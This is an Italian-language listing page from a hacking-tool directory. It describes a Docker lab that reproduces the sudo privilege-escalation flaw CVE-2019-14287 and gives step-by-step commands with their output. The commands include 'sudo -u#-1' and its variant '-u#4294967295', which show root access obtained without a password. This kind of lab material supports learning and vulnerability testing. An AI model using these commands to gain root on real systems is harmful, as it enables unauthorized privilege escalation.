Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc-cve-2019-14287 — PoC basato su Docker che dimostra l'escalation dei privilegi di sudo tramite CVE-2019-14287, con bypass della restrizione dell'utente Runas, e istruzioni di riproduzione passo-passo. | Kitploit
Strumenti/GitHubGitHub/lemonadern/poc-cve-2019-14287
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitApprendimento e FormazioneLab e Pratica
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

PoC basato su Docker che dimostra l'escalation dei privilegi di sudo tramite CVE-2019-14287, con bypass della restrizione dell'utente Runas, e istruzioni di riproduzione passo-passo.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
141 anno faNon ancora revisionato

PoC di CVE-2019-14287

Panoramica

Esempio di riproduzione della vulnerabilità sudo (CVE-2019-14287) in un contenitore Docker.

Procedura dell'esercizio

  1. Avvia il contenitore con docker compose up -d
  2. Entra nel contenitore con docker exec -it vulnerable_sudo_app bash
  3. Esegui i comandi whoami e id per verificare di essere un utente normale (non root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. Verifica che sudo -u#0 whoami e sudo -u#0 id -u non possano essere eseguiti
    • Specifica uid 0 (root) con l'opzione -u per eseguire
    • Viene richiesta la password, ma poiché non la conosci, non puoi eseguire
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. Esegui sudo -u#-1 whoami e sudo -u#-1 id -u per verificare che i comandi possano essere eseguiti come root senza autenticazione (riproduzione della vulnerabilità)
    • Lo stesso risultato si può ottenere con -u#4294967295
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

Riferimenti

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • Riepilogo sulla vulnerabilità sudo (CVE-2019-14287) - Qiita
Scarica lo strumento